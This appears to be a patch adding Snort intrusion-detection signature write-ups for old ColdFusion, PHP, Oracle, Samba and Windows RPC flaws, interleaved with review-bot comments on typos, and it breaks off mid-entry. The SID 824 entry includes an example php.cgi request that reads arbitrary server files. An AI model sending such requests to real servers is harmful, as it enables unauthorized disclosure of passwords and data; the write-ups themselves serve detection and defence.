+++ b/doc/signatures/923.txt
@@ -0,0 +1,62 @@
+SID:
+923
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
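Review bot: this file deviates from the layout of the others: "SID:" comes before "Rule:", the "--" separators precede blank lines rather than follow them, and the final heading is "References:" instead of "Additional References:". Also fix "This even indicates" (event), "This data can be accesses" (accessed) and "at type of writing" (time of writing); Summary, Impact and Detailed Information are missing their closing periods.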
--- /dev/null
+++ b/doc/signatures/100000446.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000446
+
+--
+Summary:
+Particle Wiki is susceptible to an injection attack due to a lack of input
+validation on the version variable used in the index.php component.
+
+--
+Impact:
+The injection attack could result in data leakage, or potential remote 
+compromise.
+
+--
+Detailed Information:
+Particle Wiki is prone to an SQL-injection vulnerability. This issue is due to
+a failure in the application to properly sanitize user-supplied input before
+using it in an SQL query. 
+
+A successful exploit could allow an attacker to compromise the application,
+access or modify data, or exploit vulnerabilities in the underlying database
+implementation.
+
+--
+Attack Scenarios:
+Variable manipulation can be done with any browser.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Edit code and add input validation.
+
+--
+Contributors:
+Dan Ramaswami <danr@sourcefire.com>
+
+-- 
+Additional References:
+
+-- 
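Review bot: the Affected Systems section is missing entirely (the file goes from Detailed Information straight to Attack Scenarios), even though the Summary names the product (Particle Wiki) and the vulnerable component (the version variable in index.php); add it so the file matches the others. Corrective Action ("Edit code and add input validation.") is also thinner than the usual guidance; at least name the version parameter as the input that needs validation or point to a vendor fix. The file also starts with two empty lines.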
--- /dev/null
+++ b/doc/signatures/2719.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2719
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure abort_flavor_definition
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
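Review bot: as in the other dbms_repcat entries, the procedure name is split with an orphaned period: "vulnerability in the procedure abort_flavor_definition" is followed by a line containing only "."; join it into one sentence. "Oracle Oracle9i" duplicates the vendor name and Additional References is empty.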
--- /dev/null
+++ b/doc/signatures/1197.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1197
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
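Review bot: "ona web server" should be "on a web server" and "attackers choosing" needs an apostrophe (twice). Otherwise this is the generic PHP template with an empty Additional References section, so the entry gives no pointer to the specific vulnerability SID 1197 targets.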
--- /dev/null
+++ b/doc/signatures/100000547.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000547
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PHP Blue Dragon CMS" application running on a 
+webserver. Access to the file "manual_admin.php" using a remote file being 
+passed as the "DragonRootPath" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DragonRootPath" parameter in the "manual_admin.php" 
+script used by the "PHP Blue Dragon CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHP Blue Dragon CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
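Review bot: the Attack Scenarios section does not match the Summary: the Summary describes a remote file include via the "DragonRootPath" parameter of "manual_admin.php", but the scenario ("An attacker can access an authentication mechanism and supply his/her own credentials ...") is the generic credential-bypass boilerplate, and the third paragraph of Detailed Information likewise describes unauthorized access rather than file inclusion. Suggest replacing both with the RFI-specific description already used in the first paragraph. Also "ona" should be "on a", "attackers" needs an apostrophe, and the "--" after "Sid:" and "Affected Systems:" lacks the blank line.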
--- /dev/null
+++ b/doc/signatures/824.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+824
+
+--
+Summary:
+A remote user has tried access the php.cgi script. Some versions 
+of this script can allow access to any file the
+server can read.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+Because of a design problem in this version of PHP/FI, remote users are 
+able to access any file that the UID of the http process has access to. 
+The exploit is a simple web request for the file and can be used with 
+malicious intent.
+
+--
+Affected Systems:
+	PHP/FI 2.0
+
+--
+Attack Scenarios:
+An attacker can simply pass a file name to the script 
+and be able to view the file if the web server has access
+to it. This can be used to obtain passwords or other sensitive 
+information.
+
+Example: http://somewebserver/php.cgi?/path/to/desired/file
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives: 
+None known.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Upgrade or remove the file php.cgix
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS232
+
+Bugraq:
+http://www.securityfocus.com/bid/2250
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0238
+
+--
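Review bot: Corrective Action reads "Upgrade or remove the file php.cgix", a typo for php.cgi (the script named in the Summary and in the example URL); as written an administrator looking for php.cgix will find nothing. Also "A remote user has tried access the php.cgi script" is missing "to", "Bugraq:" should be "Bugtraq:", and Detailed Information says "this version of PHP/FI" without naming it until Affected Systems (PHP/FI 2.0); naming the version there would make the paragraph self-contained.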
--- /dev/null
+++ b/doc/signatures/1383.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1383
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is 
+detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in 
+progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This 
+may be against corporate policy. p2p clients connect to other p2p 
+clients to share files, commonly music and video files but can be 
+configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to 
+transfer company confidential information to unauthorized hosts external
+to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Any HTTP GET request to a port associated with a p2p application may
+generate a false positive event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
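Review bot: "Ease of Attack: Simple." and "Attack Scenarios: This is indicative of the use of a p2p client." sit oddly in an entry whose Impact section calls the event informational; consider marking both as not applicable or describing the policy violation rather than an attack. The False Positives note is the useful part (any HTTP GET to a port associated with a p2p application can fire the rule), so the protocol should be confirmed before acting on the alert. Additional References has a stray extra blank line.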
--- /dev/null
+++ b/doc/signatures/100000712.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000712
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "register.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "register.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
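Review bot: same template mismatch as the other remote file include entries: the Summary and first paragraph of Detailed Information describe RFI via the "phpraid_dir" parameter of "register.php", but the third paragraph and the Attack Scenarios section are the generic credential-bypass text ("An attacker can access an authentication mechanism and supply his/her own credentials ..."), which does not describe this event. Also "ona" should be "on a", "attackers" needs an apostrophe, the "--" after "Sid:" and "Affected Systems:" lacks the blank line, and the file starts with two empty lines.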
--- /dev/null
+++ b/doc/signatures/1028.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1028
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
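Review bot: Detailed Information ("Many known vulnerabilities exist for this platform and the attack scenarios are legion.") gives no indication of what SID 1028 actually matches, and Additional References is empty, so an analyst cannot tell which IIS issue the alert relates to; at minimum describe the request pattern the rule looks for and link the relevant Microsoft bulletin. Also "attackers choosing" needs an apostrophe.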
--- /dev/null
+++ b/doc/signatures/2764.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2764
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_column_group_from_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
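Review bot: same issue as the other dbms_repcat files: "vulnerability in the procedure drop_column_group_from_flavor" is followed by a line consisting only of ".", leaving the sentence broken; join it. "Oracle Oracle9i" duplicates the vendor name and Additional References is empty.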
--- /dev/null
+++ b/doc/signatures/2477.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2477
+
+--
+Summary:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings then create an entry in the winreg service.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
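Review bot: the Summary and Detailed Information are word-for-word identical ("This event is generated when an attempt is made to create an AndX entry via SMB."), so the detailed section adds nothing, and Impact is "Unknown."; the Attack Scenarios text about binding to the service and creating an entry in the winreg service is the only hint of what the rule is for. Suggest expanding Detailed Information with what the AndX request is and how it relates to winreg. Also the Additional References entries are not separated by blank lines and "Microsoft Technet", "CVE" and "Winreg" lack the trailing colon used in the other files.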
--- /dev/null
+++ b/doc/signatures/2614.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2614
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases allow a user to set a time zone for the session.
+The "alter session set time_zone" command contains a programming
+error that may allow an attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in the parameter for the
+command.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string as the value for this command.
+The result could permit the attacker to gain escalated privileges and
+run code of their choosing. This attack requires an attacker to logon
+to the database with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/9587
+
+Other:
+http://www.nextgenss.com/advisories/ora_time_zone.txt
+
+--
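Review bot: grammar in the Summary and Attack Scenarios sections: "a Oracle database implementation" should read "an Oracle database implementation", and "requires an attacker to logon to the database" should be "to log on to the database". The Affected Systems entry is indented with spaces here whereas the other files in the patch indent it with a tab; use the tab for consistency.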
--- /dev/null
+++ b/doc/signatures/100000608.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000608
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_bad.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "link_bad.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
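Review bot: several wording and layout issues in this file. "may indicate that an exploitation attempt has been attempted" is redundant (suggest "may indicate an exploitation attempt"), "running ona web server" is missing a space, and "attackers choosing" needs the possessive "attacker's". The blank line that other files place before the "--" separator is missing after the Sid value, after the Affected Systems entry and after the Contributors list, and the file ends with a stray blank "+" line after the closing "--".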
--- /dev/null
+++ b/doc/signatures/1589.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1589
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
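Review bot: the text is generic boilerplate and never says what rule 1589 actually matches; "Many known vulnerabilities exist for each implementation and the attack scenarios are legion." gives the analyst nothing to triage with. Name the URI, parameter or application the signature looks for in Summary and Detailed Information, and add the corresponding advisory under Additional References, which is currently empty. Also "attackers choosing" should be "attacker's choosing".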
--- /dev/null
+++ b/doc/signatures/2616.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2616
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "grant_surrogate_repcate" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "userid" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
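Review bot: please double-check the procedure name in Detailed Information; "grant_surrogate_repcate" looks like a typo (the trailing "e"), and the name should match the content string the rule itself searches for. As in the other Oracle files, "a Oracle database implementation" should be "an Oracle database implementation" and "logon to the database" should be "log on to the database".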
--- /dev/null
+++ b/doc/signatures/3019.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3019
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
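Review bot: Additional References is empty although the Detailed Information describes a specific, patched integer overflow in the smbd memory allocation for "Samba 3.0.8 and prior"; add the vendor advisory and CVE reference so the reader can verify the affected versions. Typos: "heterogenous" should be "heterogeneous", and "remote server.The problem" is missing a space after the full stop. "None Known" and the trailing spaces on the "-- " separators are inconsistent with the rest of the patch.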
--- /dev/null
+++ b/doc/signatures/2717.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2717
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure differences
+. This procedure is included in
+dbms_rectifier_diff.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
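Review bot: the sentence in Detailed Information is broken across lines by what looks like a template substitution artefact: "vulnerability in the procedure differences" / ". This procedure is included in" / "dbms_rectifier_diff." should read "vulnerability in the procedure differences. This procedure is included in dbms_rectifier_diff." on wrapped lines without the orphaned full stop. The Affected Systems entry "Oracle Oracle9i" duplicates the vendor name. Additional References is empty; the Oracle alert for these procedure overflows would belong there.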
--- /dev/null
+++ b/doc/signatures/3277.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3277
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
